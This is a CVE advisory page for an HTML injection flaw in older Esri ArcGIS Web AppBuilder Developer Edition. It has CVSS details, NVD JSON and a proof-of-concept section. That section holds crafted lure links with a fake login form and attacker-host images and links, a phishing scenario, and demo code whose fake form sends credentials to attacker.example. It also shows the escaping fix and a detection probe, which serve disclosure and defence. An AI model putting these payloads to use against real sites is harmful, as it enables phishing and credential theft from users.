Security Vulnerability Report
CVE-2025-67712 CVSS 4.7 MEDIUM

CVE-2025-67712

Published: 2025-12-19 20:15:55
Last Modified: 2026-04-15 00:35:42

Description

There is an HTML injection issue in Esri ArcGIS Web AppBuilder developer edition versions prior to 2.30 that allows a remote, unauthenticated attacker to potentially entice a user to click a link that causes arbitrary HTML to render in a victim's browser. There is no evidence of JavaScript execution, which limits the impact. At the time of submission, ArcGIS Web App Builder developer edition is retired and unsupported. ArcGIS Web App Builder 2.30 is not susceptible to this vulnerability.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
Reading the vector: the flaw is reachable over the network with low complexity and no privileges, but the victim must click the attacker's link (UI:R). Scope is Changed because the injected markup renders in the victim's browser rather than affecting only the Web AppBuilder component. With no JavaScript execution observed, the only impact is low-integrity alteration of page content (C:N/I:L/A:N).

Configurations (Affected Products)

No CPE configuration data is available from NVD (the entry is tagged unsupported-when-assigned and its status is Deferred). From the description, the affected product is:

Esri ArcGIS Web AppBuilder Developer Edition < 2.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- HTML injection PoC for CVE-2025-67712 -->
<!-- The query parameter names below (param, returnUrl, redirect) are placeholders:
     the advisory text does not name the injectable parameter; the referenced
     write-up covers the actual injection point. Payloads are shown unencoded for
     readability; URL-encode them (e.g. < as %3C, > as %3E) when building a real link. -->

<!-- Example 1: fake "session expired" login form rendered in the victim's browser -->
<a href="http://target-arcgis-server/webappbuilder/?param=<h1>Hacked</h1><p>Your session has expired. Please login again:</p><form><input type='text' placeholder='Username'><input type='password' placeholder='Password'><button>Login</button></form>">Click here to access the map</a>

<!-- Example 2: image injection to deface the page -->
<a href="http://target-arcgis-server/webappbuilder/?returnUrl=<img src='https://attacker.com/malicious-banner.png' width='100%'/>">View Application</a>

<!-- Example 3: link injection to lure users to an attacker-controlled site -->
<a href="http://target-arcgis-server/webappbuilder/?redirect=<a href='https://attacker-phishing-site.com'>Click here for special offer</a>">Open Map</a>

<!-- Attack scenario:
     1. Attacker identifies a Web AppBuilder Developer Edition instance older than 2.30
     2. Attacker crafts an HTML injection payload
     3. Attacker sends a phishing email containing the malicious link
     4. Victim clicks the link and the injected HTML renders in their browser
     5. Victim may be tricked into entering credentials or trusting fake content
     No JavaScript execution was observed, so the impact is limited to content
     injection (CVSS I:L), not script execution. -->
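The PoC above shows the lure; the following block, added for this page and not Esri's Web AppBuilder source, shows the bug class behind it end to end: a URL query parameter concatenated into markup (the vulnerable sink), the same code with output escaping (the fix), and a canary probe that tells the two apart when testing a deployment. The parameter name "title", the placeholder host, and the attacker.example collector URL are assumptions; the advisory does not name the injectable parameter.

```javascript
// Added illustration for CVE-2025-67712 (not Esri's code): reflected HTML
// injection from a URL parameter, its fix, and a canary check.
// Assumption: the injectable parameter is called "title" and the app echoes it
// into a page header. The advisory does not name the real parameter.

// Minimal HTML escaping for text placed in element content or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function titleFromUrl(url) {
  // searchParams.get() percent-decodes, so "%3Ch1%3E" comes back as "<h1>".
  return new URL(url).searchParams.get("title") ?? "Web AppBuilder";
}

// VULNERABLE: the raw parameter is concatenated into markup. In the browser this
// is the same defect as `el.innerHTML = "<h1>" + title + "</h1>"`.
function renderHeaderUnsafe(url) {
  return `<h1 class="app-title">${titleFromUrl(url)}</h1>`;
}

// FIXED: escape before the value reaches the HTML sink (or assign textContent in
// the DOM instead of innerHTML).
function renderHeaderSafe(url) {
  return `<h1 class="app-title">${escapeHtml(titleFromUrl(url))}</h1>`;
}

// Detection: send a harmless tag in the parameter and check whether the response
// contains it verbatim. Entity-encoded output (&lt;canary ...) means the sink is safe.
const CANARY = "<canary data-cve='2025-67712'>";

function buildProbeUrl(baseUrl, paramName) {
  const u = new URL(baseUrl);
  u.searchParams.set(paramName, CANARY); // percent-encodes the payload for the wire
  return u.toString();
}

function reflectsUnencodedHtml(responseBody) {
  return responseBody.includes(CANARY);
}

// Constructed phishing payload of the kind the PoC above uses: a fake login form.
// No <script> is needed, which is exactly why the advisory rates the impact I:L.
const FAKE_LOGIN_FORM =
  "<p>Your session has expired. Please login again:</p>" +
  "<form action='https://attacker.example/collect'>" +
  "<input name='u' placeholder='Username'><input name='p' type='password'>" +
  "<button>Login</button></form>";

function demo() {
  const base = "http://target-arcgis-server/webappbuilder/"; // placeholder host
  const probe = buildProbeUrl(base, "title");
  const lure = new URL(base);
  lure.searchParams.set("title", FAKE_LOGIN_FORM);
  return {
    vulnerableReflects: reflectsUnencodedHtml(renderHeaderUnsafe(probe)), // true
    fixedReflects: reflectsUnencodedHtml(renderHeaderSafe(probe)),        // false
    unsafeRender: renderHeaderUnsafe(lure.toString()), // contains the raw <form>
    safeRender: renderHeaderSafe(lure.toString()),     // contains &lt;form ... only
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Against a live target you would fetch `buildProbeUrl(target, param)` for each candidate parameter and run `reflectsUnencodedHtml` on the response body; a hit on a Developer Edition instance older than 2.30 is the condition the advisory describes, and the fix is to move that value through `escapeHtml` (or `textContent`) before it reaches the page.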

References

https://support.esri.com/en-us/knowledge-base/deprecation-arcgis-web-appbuilder-000036340 (Esri knowledge base: deprecation of ArcGIS Web AppBuilder)
https://www.mdronski.pl/2026/01/CVE-2025-67712-Proof-of-concept-and-technical-analysis.html (proof of concept and technical analysis)

Raw JSON Data

json
{
  "cve": {
    "id": "CVE-2025-67712",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-19T20:15:55.450",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [
      {
        "sourceIdentifier": "[email protected]",
        "tags": ["unsupported-when-assigned"]
      }
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "There is an HTML injection issue in Esri ArcGIS Web AppBuilder developer edition versions prior to 2.30 that allows a remote, unauthenticated attacker to potentially entice a user to click a link that causes arbitrary HTML to render in a victim's browser. There is no evidence of JavaScript execution, which limits the impact. At the time of submission, ArcGIS Web App Builder developer edition is retired and unsupported. ArcGIS Web App Builder 2.30 is not susceptible to this vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "references": [
      {
        "url": "https://support.esri.com/en-us/knowledge-base/deprecation-arcgis-web-appbuilder-000036340",
        "source": "[email protected]"
      },
      {
        "url": "https://www.mdronski.pl/2026/01/CVE-2025-67712-Proof-of-concept-and-technical-analysis.html",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}